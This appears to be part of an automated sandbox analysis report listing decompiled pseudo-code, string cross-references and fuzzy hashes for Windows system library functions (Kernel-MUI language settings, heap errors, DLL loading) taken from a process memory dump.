                                                                          0x016f1e15
                                                                          0x016f1e2a
                                                                          0x016f1e2f
                                                                          0x016f1e39
                                                                          0x016f1e4a
                                                                          0x016f1e02
                                                                          0x016f1e02
                                                                          0x016f1e08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x016f1e08
                                                                          0x016f1e5b
                                                                          0x016f1e7a
                                                                          0x016f1e7b
                                                                          0x016f1e5d
                                                                          0x016f1e72
                                                                          0x016f1e77
                                                                          0x016f1e95

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                          • API String ID: 0-2897834094
                                                                          • Opcode ID: ddf83d2f564729963f1ef73c6690287f020af97b8eab143eac0fbed7f6b31fc2
                                                                          • Instruction ID: e28e5d222f2a4c28f605e5c494434ea5759aaf9245e23d4d5d69706f05b2bef1
                                                                          • Opcode Fuzzy Hash: ddf83d2f564729963f1ef73c6690287f020af97b8eab143eac0fbed7f6b31fc2
                                                                          • Instruction Fuzzy Hash: 92611337591565DFC221AF89DC84E3573A6EB05A71B09807FFB0A6B340D6B998428F0E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01643D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E01643D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01641B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01641B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01641B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01641B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01641B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01654620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0167F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01681370(_t276, 0x1614e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0167BB40(0,  &_v68, _t170);
									if(L016443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0167BB40(_t257,  &_v68, _t243);
								if(L016443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01681370(_t278, 0x1614e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01654620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0167F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01681370(_v16, 0x1614e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0167BB40(_t262,  &_v68, _t244);
								if(L016443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01681370(_t282, 0x1614e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0167BB40(_t262,  &_v68, _t201);
							if(L016443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01654620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0167F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01681370(_t280, 0x1614e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0167BB40(_t267,  &_v68, _t245);
							if(L016443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01681370(_t284, 0x1614e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0167BB40(_t267,  &_v68, _t224);
						if(L016443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                          0x01643d3c
                                                                          0x01643d42
                                                                          0x01643d44
                                                                          0x01643d46
                                                                          0x01643d49
                                                                          0x01643d4c
                                                                          0x01643d4f
                                                                          0x01643d52
                                                                          0x01643d55
                                                                          0x01643d58
                                                                          0x01643d5b
                                                                          0x01643d5f
                                                                          0x01643d61
                                                                          0x01643d66
                                                                          0x01698213
                                                                          0x01698218
                                                                          0x01644085
                                                                          0x01644088
                                                                          0x0164408e
                                                                          0x01644094
                                                                          0x0164409a
                                                                          0x016440a0
                                                                          0x016440a6
                                                                          0x016440a9
                                                                          0x016440af
                                                                          0x016440b6
                                                                          0x016440bd
                                                                          0x016440bd
                                                                          0x01643d83
                                                                          0x0169821f
                                                                          0x01698229
                                                                          0x01698238
                                                                          0x01698238
                                                                          0x0169823d
                                                                          0x0169823d
                                                                          0x01643da0
                                                                          0x01643daf
                                                                          0x01643db5
                                                                          0x01643dba
                                                                          0x01643dba
                                                                          0x01643dd4
                                                                          0x01643e94
                                                                          0x01643eab
                                                                          0x01643f6d
                                                                          0x01643f84
                                                                          0x0164406b
                                                                          0x0164406b
                                                                          0x0164406e
                                                                          0x0164406e
                                                                          0x01644070
                                                                          0x01644074
                                                                          0x01698351
                                                                          0x01698351
                                                                          0x0164407a
                                                                          0x0164407f
                                                                          0x0169835d
                                                                          0x01698370
                                                                          0x01698377
                                                                          0x01698379
                                                                          0x0169837c
                                                                          0x0169837c
                                                                          0x0169835d
                                                                          0x00000000
                                                                          0x0164407f
                                                                          0x01643f8a
                                                                          0x01643f8d
                                                                          0x01643f90
                                                                          0x01643f95
                                                                          0x0169830d
                                                                          0x0169830f
                                                                          0x01643f9b
                                                                          0x01643fac
                                                                          0x01643fae
                                                                          0x01643fb1
                                                                          0x01643fb1
                                                                          0x01643fb6
                                                                          0x01698317
                                                                          0x0169831a
                                                                          0x00000000
                                                                          0x01643fbc
                                                                          0x01643fc1
                                                                          0x01643fc9
                                                                          0x01643fd7
                                                                          0x01643fda
                                                                          0x01643fdd
                                                                          0x01644021
                                                                          0x01644021
                                                                          0x01644029
                                                                          0x01644030
                                                                          0x01644044
                                                                          0x01644046
                                                                          0x01644046
                                                                          0x01644044
                                                                          0x01644049
                                                                          0x01698327
                                                                          0x01698334
                                                                          0x01698339
                                                                          0x0169833c
                                                                          0x0164404f
                                                                          0x0164404f
                                                                          0x0164404f
                                                                          0x01644051
                                                                          0x01644056
                                                                          0x01644063
                                                                          0x01644063
                                                                          0x01644068
                                                                          0x00000000
                                                                          0x01644068
                                                                          0x01643fdf
                                                                          0x01643fe2
                                                                          0x01643fe4
                                                                          0x01643fe7
                                                                          0x01643fef
                                                                          0x01644003
                                                                          0x01644005
                                                                          0x01644005
                                                                          0x0164400c
                                                                          0x01644013
                                                                          0x01644016
                                                                          0x01644017
                                                                          0x0164401b
                                                                          0x0164401e
                                                                          0x00000000
                                                                          0x0164401e
                                                                          0x01643fb6
                                                                          0x01643eb1
                                                                          0x01643eb4
                                                                          0x01643eb7
                                                                          0x01643ebc
                                                                          0x016982a9
                                                                          0x016982ab
                                                                          0x01643ec2
                                                                          0x01643ed3
                                                                          0x01643ed5
                                                                          0x01643ed8
                                                                          0x01643ed8
                                                                          0x01643edd
                                                                          0x016982b3
                                                                          0x016982b6
                                                                          0x00000000
                                                                          0x01643ee3
                                                                          0x01643ee8
                                                                          0x01643eed
                                                                          0x01643ef0
                                                                          0x01643ef3
                                                                          0x01643f02
                                                                          0x01643f05
                                                                          0x01643f08
                                                                          0x016982c0
                                                                          0x016982c3
                                                                          0x016982c5
                                                                          0x016982c8
                                                                          0x016982d0
                                                                          0x016982e4
                                                                          0x016982e6
                                                                          0x016982e6
                                                                          0x016982ed
                                                                          0x016982f4
                                                                          0x016982f7
                                                                          0x016982f8
                                                                          0x016982fc
                                                                          0x016982ff
                                                                          0x016982ff
                                                                          0x01643f0e
                                                                          0x01643f11
                                                                          0x01643f16
                                                                          0x01643f1d
                                                                          0x01643f31
                                                                          0x01698307
                                                                          0x01698307
                                                                          0x01643f31
                                                                          0x01643f39
                                                                          0x01643f48
                                                                          0x01643f4d
                                                                          0x01643f50
                                                                          0x01643f50
                                                                          0x01643f53
                                                                          0x01643f58
                                                                          0x01643f65
                                                                          0x01643f65
                                                                          0x01643f6a
                                                                          0x00000000
                                                                          0x01643f6a
                                                                          0x01643edd
                                                                          0x01643dda
                                                                          0x01643ddd
                                                                          0x01643de0
                                                                          0x01643de5
                                                                          0x01698245
                                                                          0x01643deb
                                                                          0x01643df7
                                                                          0x01643dfc
                                                                          0x01643dfe
                                                                          0x01643e01
                                                                          0x01643e01
                                                                          0x01643e06
                                                                          0x0169824d
                                                                          0x0169824f
                                                                          0x01698254
                                                                          0x00000000
                                                                          0x01643e0c
                                                                          0x01643e11
                                                                          0x01643e16
                                                                          0x01643e19
                                                                          0x01643e29
                                                                          0x01643e2c
                                                                          0x01643e2f
                                                                          0x0169825c
                                                                          0x0169825f
                                                                          0x01698261
                                                                          0x01698264
                                                                          0x0169826c
                                                                          0x01698280
                                                                          0x01698282
                                                                          0x01698282
                                                                          0x01698289
                                                                          0x01698290
                                                                          0x01698293
                                                                          0x01698294
                                                                          0x01698298
                                                                          0x0169829b
                                                                          0x0169829b
                                                                          0x01643e35
                                                                          0x01643e38
                                                                          0x01643e3d
                                                                          0x01643e44
                                                                          0x01643e58
                                                                          0x016982a3
                                                                          0x016982a3
                                                                          0x01643e58
                                                                          0x01643e60
                                                                          0x01643e6f
                                                                          0x01643e74
                                                                          0x01643e77
                                                                          0x01643e77
                                                                          0x01643e7a
                                                                          0x01643e7f
                                                                          0x01643e8c
                                                                          0x01643e8c
                                                                          0x01643e91
                                                                          0x00000000
                                                                          0x01643e91

                                                                          Strings
                                                                          • Kernel-MUI-Language-SKU, xrefs: 01643F70
                                                                          • Kernel-MUI-Number-Allowed, xrefs: 01643D8C
                                                                          • WindowsExcludedProcs, xrefs: 01643D6F
                                                                          • Kernel-MUI-Language-Allowed, xrefs: 01643DC0
                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01643E97
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                          • API String ID: 0-258546922
                                                                          • Opcode ID: 06054f1b28c66ac0c968acf0cfba78075070af626aa6f28a3055f73f959d0fb9
                                                                          • Instruction ID: cbf1276fd02743537dbf13c46622d1b9cca971edec6a2afcf680a54e826d12da
                                                                          • Opcode Fuzzy Hash: 06054f1b28c66ac0c968acf0cfba78075070af626aa6f28a3055f73f959d0fb9
                                                                          • Instruction Fuzzy Hash: 42F12B72D00619EBCB11DF98CD80AEEBBBDFF59A50F14406AE905A7350DB349E01CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01668E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 016A933B, 016A9367
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 016A9357
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016A932A
                                                                          • LdrpFindDllActivationContext, xrefs: 016A9331, 016A935D
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 0-3779518884
                                                                          • Opcode ID: cbf5114b1f8a363669535d2034be94024b3f2fb1614c99c49d484c1d0a732ddc
                                                                          • Instruction ID: cd05d7eaca7515f34b7bf3303ec492bfb2d612f43a51a80ece3d2ac8b6165570
                                                                          • Opcode Fuzzy Hash: cbf5114b1f8a363669535d2034be94024b3f2fb1614c99c49d484c1d0a732ddc
                                                                          • Instruction Fuzzy Hash: 22411A32A403159FDB36AF3DCC49A75BABDAB40358F09816DEA0557252E770ADC1C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01648794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01699C28
                                                                          • LdrpDoPostSnapWork, xrefs: 01699C1E
                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01699C18
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 2994545307-1948996284
                                                                          • Opcode ID: b3832b09dfb1a7b0783362866f9f50780608c65ca1f88a032da9c52419c3714c
                                                                          • Instruction ID: 4dac3571be6d00f0d5b04ec8f1ec2fededea9de5d9171ee54a337df9600b7005
                                                                          • Opcode Fuzzy Hash: b3832b09dfb1a7b0783362866f9f50780608c65ca1f88a032da9c52419c3714c
                                                                          • Instruction Fuzzy Hash: 0591E071A00216DFEF29DF9DDC81ABAB7BAFF54314B05416DEA05AB241E730E941CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01647E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01699891
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 016998A2
                                                                          • LdrpCompleteMapModule, xrefs: 01699898
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: 6861edd4a767c362a895723ddb5c529dbc1d6714b563560ecb7ddf1c43327712
                                                                          • Instruction ID: 03b03c644053a8cb51d00aec61baea6e81955a71577a8e7db62b5b1bab2c6895
                                                                          • Opcode Fuzzy Hash: 6861edd4a767c362a895723ddb5c529dbc1d6714b563560ecb7ddf1c43327712
                                                                          • Instruction Fuzzy Hash: 5A51DF316007469BEB32CB6CCD44B6ABBE9EB44314F1406ADE9529B7D1D734ED02CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0163E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • InstallLanguageFallback, xrefs: 0163E6DB
                                                                          • @, xrefs: 0163E6C0
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0163E68C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                          • API String ID: 0-1757540487
                                                                          • Opcode ID: c18a8d87af842cc25fab677297327d6aea8ab70e4a0b79cd59e384a0cf2039bd
                                                                          • Instruction ID: 9aefa5a6916f15888bec46f8ae6a56369901f4f5b6770367a4dc4885afa30389
                                                                          • Opcode Fuzzy Hash: c18a8d87af842cc25fab677297327d6aea8ab70e4a0b79cd59e384a0cf2039bd
                                                                          • Instruction Fuzzy Hash: B451A0725053069BDB12DF68CC50A7BB7E9AF88B54F04092EF986D7340EB34D904C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016FE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                          • Instruction ID: 2dc4219b6ee9ca04ecf2366f0fe7d7f8a81315ddb593a615fd7f903ebdd5df9e
                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                          • Instruction Fuzzy Hash: 1C9180312043429FE724CE69CC45B2BBBE6AF84714F15892DF795CB290E776E904CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: fdd1707ea4cec952db69e74d8ed1dec9807d3538b954fd1632c067dab15433fa
                                                                          • Instruction ID: 276d15291811980d3c4b9720d91350d3aa3ccef3f61f21cc779a1e293e8e05c2
                                                                          • Opcode Fuzzy Hash: fdd1707ea4cec952db69e74d8ed1dec9807d3538b954fd1632c067dab15433fa
                                                                          • Instruction Fuzzy Hash: 1A516C71A017099FDB24DFA88D80AEEBBF9BB48700F14406DE64AEB351E7719981CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0163B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _vswprintf_s
                                                                          • String ID:
                                                                          • API String ID: 677850445-0
                                                                          • Opcode ID: 97684b3cbb91048f6862654e48dde023df496e5bab61546d7b81a831b0d39e9a
                                                                          • Instruction ID: 48c42f2c33f76effb696d721819d8c74b4745594eb96fcb7cb46623ce83b92f6
                                                                          • Opcode Fuzzy Hash: 97684b3cbb91048f6862654e48dde023df496e5bab61546d7b81a831b0d39e9a
                                                                          • Instruction Fuzzy Hash: 5151CF71D002598BEF31CF68CE44BBEBBB5AF00714F1142ADD859AB382DB708942CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0165B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165B9A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 885266447-0
                                                                          • Opcode ID: a8e5ca369c3b4c92dce257418063e64dba697aabfd07e7b79251ad0c79164dd4
                                                                          • Instruction ID: e5e584598b99d5f769de37a8c178b36cc141f0c5f29181aa059872e1c2742a69
                                                                          • Opcode Fuzzy Hash: a8e5ca369c3b4c92dce257418063e64dba697aabfd07e7b79251ad0c79164dd4
                                                                          • Instruction Fuzzy Hash: DE515771A08341CFC761CF2CC88092ABBF6FB88610F54896EFA8587355DB71E845CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01662581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PATH
                                                                          • API String ID: 0-1036084923
                                                                          • Opcode ID: 05cb9f11c451cbf2f77ff448a1596b49788caa557f8b1efd3d2f17596eea10c5
                                                                          • Instruction ID: 1ded2fe8cd84c39dc4b4a8f37202981e78de9ee5e4e9bbd4eb74b0714b636495
                                                                          • Opcode Fuzzy Hash: 05cb9f11c451cbf2f77ff448a1596b49788caa557f8b1efd3d2f17596eea10c5
                                                                          • Instruction Fuzzy Hash: 13C16EB1E002199BDB25DF99DCA0ABDBBB5FF58750F44802DE901AB350D738AD42CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0166FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 016ABE0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                          • API String ID: 0-865735534
                                                                          • Opcode ID: 71ef9f47c5c3c8ef473c87d46de5459a0b939f6c58cb35f38592e34ced237942
                                                                          • Instruction ID: 3e52a19ac064ab668b08ee9b337e498258f50bbe1b9acc58f7bf80810b22afed
                                                                          • Opcode Fuzzy Hash: 71ef9f47c5c3c8ef473c87d46de5459a0b939f6c58cb35f38592e34ced237942
                                                                          • Instruction Fuzzy Hash: 1AA1E271A006069BEB25DF6CDC6076ABBA9BF44710F0445ADEA16DB785DB30DC42CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01632D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Re-Waiting
                                                                          • API String ID: 0-316354757
                                                                          • Opcode ID: aa9018936601e11ee9d28bec44cb231de7d116a604b1cdfa6021ad1f37b61442
                                                                          • Instruction ID: e392bbddeae4259da1301521eec8ec15d2ba0671fb25ee3a0abc9030dbefdd76
                                                                          • Opcode Fuzzy Hash: aa9018936601e11ee9d28bec44cb231de7d116a604b1cdfa6021ad1f37b61442
                                                                          • Instruction Fuzzy Hash: 5F613431A00605EFEB32EF6CCC94B7EBBA5EB84724F1402ADE911973C1C734994287A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01700EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `
                                                                          • API String ID: 0-2679148245
                                                                          • Opcode ID: f1aa87a2ab67449ab3a5e70810a16ab3ff5e364bf6317a08e91d29e172ff1d4a
                                                                          • Instruction ID: 7a603668de32f4ac004249baf2eb323095e1b7b9162ee57c3e2b43c99f653c0c
                                                                          • Opcode Fuzzy Hash: f1aa87a2ab67449ab3a5e70810a16ab3ff5e364bf6317a08e91d29e172ff1d4a
                                                                          • Instruction Fuzzy Hash: D551B071304382DFD326DF28D884B1BBBE5EBC4754F444A2CFA9697290D671E905C762
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0166F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                          Download Yara Rule
